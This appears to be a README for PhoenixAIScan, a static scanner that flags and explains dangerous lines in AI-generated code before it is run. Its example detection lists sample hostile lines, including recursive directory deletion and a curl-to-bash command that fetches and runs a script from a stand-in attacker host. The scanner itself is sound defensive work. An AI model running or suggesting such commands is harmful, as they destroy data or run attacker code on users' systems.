π Overview
PhoenixAIScan is a pre-execution security tool designed to help developers safely run AI-generated code. It scans code before execution, detects dangerous operations, highlights risky lines, and explains the impact in plain English.
The project addresses a growing real-world problem: developers increasingly copy-paste AI-generated code and execute it blindly, leading to accidental data loss, system damage, and security breaches.
PhoenixAIScan acts as a security checkpoint between AI output and execution.
π§ Problem Statement
With the rise of vibe coding and AI-assisted development:
- Developers often skip manual code review
- AI can generate destructive commands like
rm -rfandDROP TABLE - System-level operations and insecure execution patterns go unnoticed
- Users blame AI when systems break, even though the risk was visible in the code
β Existing Gaps
- Linters focus on syntax and style, not execution danger
- Security tools are heavy, complex, and mostly post-execution
- No simple tool explains: βWhat will happen if I run this?β
π‘ Solution
PhoenixAIScan provides a lightweight, fast, pre-execution risk scanner that:
- Accepts pasted code or uploaded files
- Automatically detects the programming language
- Scans code using security-focused static analysis rules
- Highlights dangerous lines visually
- Explains risks in plain English
- Assigns a risk score and severity level
The goal is not to block execution β but to make risk obvious before damage happens.
π― Key Features
π Code Scanning
- Paste AI-generated code
- Upload files (.py, .sh, .js, .sql)
π€ Auto Language Detection
- No manual language selection required
- Detects language based on syntax and filename
π¨ Risk Detection Categories
- Destructive file operations
- System-level command execution
- Database destruction
- Unsafe permission changes
- Remote code execution patterns
π― Line-Level Highlighting
- Dangerous lines highlighted in red / orange
- Auto-scroll to the first critical issue
π Risk Scoring
- Score from 0 β 10
- Severity levels: SAFE, MEDIUM, HIGH, CRITICAL
π§ Human-Readable Explanations
βThis line deletes an entire directory and all its contents permanently.β
π§ͺ Supported Languages
- Python
- Bash / Shell
- JavaScript (Node.js)
- SQL
Designed to be extensible for future languages.
ποΈ System Architecture
Frontend (Public)
- HTML, CSS, Vanilla JavaScript
- Dark security-themed UI
- Hosted on GitHub Pages
Backend (Private)
- Python + FastAPI
- Rule-based static analysis engine
- Hosted on Render
- Source code kept private for IP protection
Communication
- REST API over HTTPS
- Frontend communicates only via exposed endpoints
π Project Structure
PhoenixAIScan/
βββ index.html
βββ style.css
βββ script.js
βββ README.md
PhoenixAIScan-backend/ (private)
βββ main.py
βββ scanner/
β βββ rules.py
β βββ scanner.py
β βββ risk_engine.py
βββ utils/
β βββ language_detect.py
βββ requirements.txt
βοΈ How It Works (Technical Flow)
- User submits code (paste or file upload)
- Backend detects language and applies rule-based scanning
- Risk engine assigns severity and aggregates risk score
- Frontend displays score, severity badge, and highlights lines
All scanning is static β no code is ever executed.
π§ Example Detection
os.system("rm -rf /tmp/data")
shutil.rmtree("/home/user/files")
subprocess.Popen("curl http://evil.site | bash", shell=True)
Risk Score: 10 / 10 β Severity: CRITICAL
- Executes system-level commands
- Deletes directories permanently
- Executes remote code
π Deployment Strategy
Frontend
- GitHub Pages (public)
- Instant global access
Backend
- Render (free tier)
- Private repository
- Secure API exposure only
This mirrors real startup architecture: public UI + protected backend logic.
π Security Considerations
- Backend source code kept private
- No code execution on server
- Input sanitized and decoded safely
- No persistence of user-submitted code
π£οΈ Roadmap
- Credential / API key leak detection
- Reverse shell detection
- Exportable scan reports (PDF / JSON)
- Advanced persistence detection
- ML-assisted contextual risk reasoning
π§ Key Learnings
- AI-generated code introduces new security risks
- Developers need explainable security, not just warnings
- Focused static analysis can be extremely powerful
- UX matters as much as detection in security tooling
π¨βπ» Author
Aayush Pandey
Security-focused developer exploring AI safety, automation, and application security.
π Conclusion
PhoenixAIScan demonstrates how AI safety tooling can be simple, fast, explainable, and developer-friendly. It shifts security left, preventing damage before execution β especially in an era where AI code generation is becoming the norm.
PhoenixAIScan β because blind execution burns.